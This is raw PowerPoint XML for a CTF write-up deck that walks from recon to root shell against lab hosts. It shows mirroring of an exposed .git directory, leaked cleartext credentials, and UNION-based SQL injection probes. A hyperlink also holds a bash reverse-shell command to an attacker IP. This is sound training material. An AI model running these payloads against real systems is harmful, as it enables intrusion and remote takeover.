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7" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="263"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4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A2478-E243-4531-88FA-C6F99FFBF68A}"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5AF46-2971-41C5-A9F8-444ADF29B288}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374570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B5AF46-2971-41C5-A9F8-444ADF29B288}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32448176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BD8754-7523-474A-A84E-14A02772ACF3}"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28406F0-41D1-4269-8272-FF0ECE0A880E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354579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BD8754-7523-474A-A84E-14A02772ACF3}"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355153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BD8754-7523-474A-A84E-14A02772ACF3}"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424792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BD8754-7523-474A-A84E-14A02772ACF3}"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149922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2BD8754-7523-474A-A84E-14A02772ACF3}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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28406F0-41D1-4269-8272-FF0ECE0A880E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408525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BD8754-7523-474A-A84E-14A02772ACF3}"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408964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BD8754-7523-474A-A84E-14A02772ACF3}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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323280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2BD8754-7523-474A-A84E-14A02772ACF3}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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157668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D8754-7523-474A-A84E-14A02772ACF3}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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271121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BD8754-7523-474A-A84E-14A02772ACF3}"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263299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BD8754-7523-474A-A84E-14A02772ACF3}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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28406F0-41D1-4269-8272-FF0ECE0A880E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75832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2BD8754-7523-474A-A84E-14A02772ACF3}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>03-08-2025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28406F0-41D1-4269-8272-FF0ECE0A880E}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2496629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192.168.177.132/.git" TargetMode="Externa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mailto:lanf@admin.com"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mailto:jehad@192.168.139.143" TargetMode="Externa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mailto:jehad@192.168.139.143" TargetMode="Externa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127.0.0.1:9999/index.php?cmd=bash%20-c%20%27bash%20i%20%3E%26%20/dev/tcp/192.168.139.139/9001%200%3E%261%27" TargetMode="Externa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BDEE-76C2-8952-2725-67242CE42ABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962108" y="1399032"/>
            <a:ext cx="9966960" cy="3035808"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="sng" dirty="0"/>
              <a:t>CTF Exploitation Breakdown form Recon to Root Shell.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFEB5F8E-BFEA-EE7E-C012-74F38D52B14A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069848" y="4389120"/>
            <a:ext cx="8501536" cy="1952046"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0"/>
              <a:t>Execution Summary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>This project </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>simulating a real-world attack scenario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Created By: Shubham K</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200941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5C80-BC00-3AA7-6A1D-DB65E5B25F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A3463-4CDA-A1DD-50D4-07C2D14059F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="298175"/>
            <a:ext cx="6559826" cy="5874026"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>We downloaded the /.git repository locally to our machine:         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>  Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0"/>
              <a:t>wget -r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://192.168.177.132/.git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>We then checked the git logs and came across clear credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0"/>
              <a:t>Credential Disclosure via Git Logs Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2800" b="1" dirty="0">
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>The target system's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0"/>
              <a:t>.git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>directory was publicly accessible, exposing version control history, including a commit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0"/>
              <a:t>a4d900a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>) that contained hardcoded credentials (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0"/>
              <a:t>lanf@admin.com:321</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>) in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Severity: Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" i="1" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>CVSS Score: 5.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1700" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>To get cleartext credentials: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>git show a4d900a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{430B9744-FC56-F427-5B0B-4FCE85BF02BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect r="41199"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6979920" y="243841"/>
            <a:ext cx="4566283" cy="1503680"/>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C94561DD-8B8C-1B11-36CE-C874F67C2D1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6979921" y="1945639"/>
            <a:ext cx="4566284" cy="1950721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCF542BA-05FE-C60F-B4A6-E8D9C1D7051C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect r="5178" b="19600"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6979920" y="4135119"/>
            <a:ext cx="4566283" cy="1950721"/>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59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07BB9-6C42-3DCE-22DF-FAB03EEE9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571C3-1BEF-71CD-4EE0-124C79AC33D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="477079"/>
            <a:ext cx="6957391" cy="5695122"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" u="sng" dirty="0"/>
              <a:t>Authentication &amp; Web Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" b="1" i="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>Utilized those credentials to access the web application as a legit user:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>User ID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>lanf@admin.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Password:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>321</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Weak Login Form (No Brute Force Protection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The target web application's login form (located at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>) lacked protections against brute-force attacks. Exploit leaked credentials (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>lanf@admin.com:321 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>from Git logs) without detection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>Medium </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>CVSS Score: 5.3 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEF41E7F-368F-082C-2DDE-C9C7527973DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect b="16489"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7399140" y="304800"/>
            <a:ext cx="4475989" cy="2570480"/>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AB644FBB-4C2A-BA52-5254-C35252DE3506}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect b="16489"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7399140" y="3300730"/>
            <a:ext cx="4475989" cy="2781875"/>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94306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C6DFB-BF8D-5864-ABF6-D78BAC8D60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B46A1-7B6B-0CAD-F105-01EF5312A605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308112" y="288235"/>
            <a:ext cx="6500191" cy="5883965"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" b="1" u="sng" dirty="0"/>
              <a:t>SQL Injection Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" b="1" i="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>We noticed there the GET parameter called ‘id=’ We manually tried </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t> command (‘) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>This error strongly suggests a potential SQL Injection (SQLi) vulnerability in the id parameter of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3300" b="1" dirty="0"/>
              <a:t>SQL Injection via ‘id’ Parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>page was vulnerable to UNION-based SQL injection due to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> input in the id GET parameter. Execute arbitrary SQL queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Severity: High CVSS Score: 8.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>We mostly benefited from the UNION query. However, we needed to identify the number of columns on that target table. For that, we used the ORDER BY query to see how many columns it stored.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>id=' ORDER BY 5 -- - </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>URL Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>%27%20%4f%52%44%45%52%20%42%59%20%35%20%2d%2d%20%2d </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>id=' ORDER BY 6 -- - </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>id=' ORDER BY 7 -- - </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4CFFE30-379E-DC29-02CF-3F33CC65DC81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7248268" y="296257"/>
            <a:ext cx="4650041" cy="1174522"/>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B163A770-0FC6-0B83-93F2-4A56D371D442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7248268" y="1784525"/>
            <a:ext cx="4650040" cy="1589579"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
